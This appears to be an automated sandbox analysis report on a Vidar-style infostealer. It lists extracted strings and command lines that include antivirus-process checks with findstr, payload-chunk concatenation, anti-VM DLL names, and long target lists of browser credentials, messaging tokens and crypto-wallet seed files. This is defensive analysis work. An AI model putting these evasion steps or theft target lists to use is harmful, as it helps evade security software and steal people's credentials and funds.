            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: nB52P46OJD.exeStatic file information: File size 1357367 > 1048576
            Source: nB52P46OJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cryptosetup.pdbGCTL source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: Binary string: cryptosetup.pdb source: Participating.com, 0000000B.00000002.2647629721.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, RIMOH4.11.dr
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: nB52P46OJD.exeStatic PE information: real checksum: 0x1598d1 should be: 0x157e95
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF29D3 push ds; iretd 11_2_00CF29D6
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00DE6 push ecx; ret 11_2_00D00DF9
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D36E54 push 1B7900D3h; iretd 11_2_00D36E59
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D36E5C push 1B7900D3h; iretd 11_2_00D36E65
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF1768 push cs; iretd 11_2_00CF176A
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CF1765 push cs; iretd 11_2_00CF1766

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\615578\Participating.comJump to dropped file
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\615578\Participating.comJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile created: C:\ProgramData\479RQ1NOHDJM\RIMOH4Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile created: C:\ProgramData\479RQ1NOHDJM\RIMOH4Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile created: C:\ProgramData\479RQ1NOHDJM\RIMOH4Jump to dropped file

            Boot Survival

            barindex
            Monitors registry run keys for changes
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D726DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00D726DD
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CFFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00CFFC7C
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_11-104731
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: Participating.com, 0000000B.00000002.2640138284.0000000000131000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comDropped PE file which has not been started: C:\ProgramData\479RQ1NOHDJM\RIMOH4Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comAPI coverage: 3.7 %
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4DC54
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A087
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00D5A1E2
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00D4E472
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00D5A570
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D566DC FindFirstFileW,FindNextFileW,FindClose,11_2_00D566DC
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1C622 FindFirstFileExW,11_2_00D1C622
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D573D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00D573D4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D57333 FindFirstFileW,FindClose,11_2_00D57333
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00D4D921
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00CE5FC8
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 12.1294acdd3f4c6dd4a258e9798170c0159INSERT_KEY_HEREGetProcALoadLibrlstrcatAOpenEvenCreateEvCloseHanVirtualAllocExNuVirtualFGetSysteVirtualAHeapAlloGetComputerNameAlstrcpyAGetProceGetCurrentProceslstrlenAExitProcSystemTimeToFileadvapi32gdi32.dluser32.dcrypt32.ntdll.dlGetUserNCreateDCGetDevicReleaseDVMwareVMJohnDoe%hu/%hu/GetEnvironmentVariableAGetFileAttributeGlobalLoHeapFreeGetFileSGlobalSiIsWow64PProcess3GetLocalFreeLibrGetTimeZoneInforGetSystemPowerStGetWindowsDirectGetModuleFileNamDeleteFiFindNextLocalFreFindClosSetEnvironmentVaLocalAllReadFileSetFilePWriteFilCreateFiFindFirsCopyFileVirtualPGetLastElstrcpynMultiByteToWideCGlobalFrWideCharToMultiBGlobalAlOpenProcTerminateProcessgdiplus.ole32.dlbcrypt.dwininet.shlwapi.shell32.psapi.dlrstrtmgrCreateCompatibleSelectObDeleteObGdiplusSGdiplusShutdownGdipSaveImageToSGdipDisposeImageGdipFreeGetHGlobalFromStCreateStreamOnHGCoUninitCoInitiaCoCreateInstanceBCryptDeBCryptSetPropertBCryptDestroyKeyGetWindoGetDesktopWindowCloseWinwsprintfEnumDisplayDevicGetKeyboardLayouCharToOeRegQueryValueExARegEnumKRegOpenKRegCloseRegEnumVCryptBinaryToStrSHGetFolderPathAShellExecuteExAInternetOpenUrlAInternetConnectAInternetCloseHanInternetHttpSendRequestAHttpOpenRequestAInternetReadFileInternetCrackUrlStrCmpCAStrStrAStrCmpCWPathMatcRmStartSRmRegisterResourRmGetLisRmEndSessqlite3_sqlite3_prepare_sqlite3_column_tsqlite3_finalizesqlite3_column_bencrypteNSS_InitNSS_ShutPK11_GetInternalKeySlotPK11_FrePK11_AuthenticatPK11SDR_DecryptC:\ProgramData\profile:Login: PasswordOperaGXNetworkCookiesAutofillHistoryMonth: Login DaWeb Datalogins.jformSubmusernameencryptedUsernamencryptedPassworcookies.places.sPluginsSync Extension SettingsIndexedDOpera StOpera GX StableCURRENTchrome-extension_0.indexeddb.levLocal StprofilesfirefoxWallets%08lX%04ProductN%d/%d/%d %d:%d:%DisplayNDisplayVfreebl3.mozglue.msvcp140nss3.dllsoftokn3vcruntime140.dll/c start%DESKTOP%APPDATA%LOCALAP%USERPRO%DOCUMEN%PROGRAM%PROGRAMFILES_86%RECENT%\discord\Local Storage\l\Telegram Desktokey_dataD877F783D5D3EF8CA7FDF864FBC10B77A92DAA6EA6F891F2F8806DD0C461824FTelegram\.purpleaccountsdQw4w9Wgtoken: Software\Valve\SSteamPat\config\config.vDialogConfig.vdflibraryfolders.vloginuse\Steam\sqlite3.browsers\Discord\tokens.HTTP/1.1file_nammessagescreensh
            Source: Web Data.23.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: discord.comVMware20,11696494690f
            Source: Web Data.23.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: Web Data.23.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: Web Data.23.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: Web Data.23.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: Participating.com, 0000000B.00000002.2645190328.00000000019EA000.00000004.00000020.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2646862298.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msedge.exe, 00000015.00000003.2150384624.000047B80030C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
            Source: Web Data.23.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: Web Data.23.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: Web Data.23.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: msedge.exe, 00000015.00000002.2187098588.0000022AE9044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Web Data.23.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: Web Data.23.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: Web Data.23.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: nB52P46OJD.exeBinary or memory string: =qEMu
            Source: Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVM
            Source: Web Data.23.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: Web Data.23.drBinary or memory string: global block list test formVMware20,11696494690
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
            Source: Web Data.23.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: Web Data.23.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: Web Data.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: Web Data.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: Web Data.23.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: Web Data.23.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D5F4FF BlockInput,11_2_00D5F4FF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00CE338B
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D05058 mov eax, dword ptr fs:[00000030h]11_2_00D05058
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D420AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,11_2_00D420AA
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D12992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D12992
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00D00BAF
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00D45 SetUnhandledExceptionFilter,11_2_00D00D45
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00D00F91
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00D41B4D
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00CE338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00CE338B
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4BBED SendInput,keybd_event,11_2_00D4BBED
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D4ECD0 mouse_event,11_2_00D4ECD0
            Source: C:\Users\user\Desktop\nB52P46OJD.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Verzeichnis Verzeichnis.cmd && Verzeichnis.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 615578Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "applied" Manually Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Saddam + ..\Intro + ..\Perfectly + ..\Robertson + ..\Warm wJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\615578\Participating.com Participating.com wJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D414AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_00D414AE
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D41FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_00D41FB0
            Source: Participating.com, 0000000B.00000000.1444230064.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp, Participating.com.2.dr, Computing.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: Participating.comBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D00A08 cpuid 11_2_00D00A08
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D3E5F4 GetLocalTime,11_2_00D3E5F4
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D3E652 GetUserNameW,11_2_00D3E652
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D1BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00D1BCD2
            Source: C:\Users\user\Desktop\nB52P46OJD.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

            Stealing of Sensitive Information

            barindex
            Yara detected Vidar stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: pData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|All_Disk|%DRIVE_FIXED%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash_Card|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
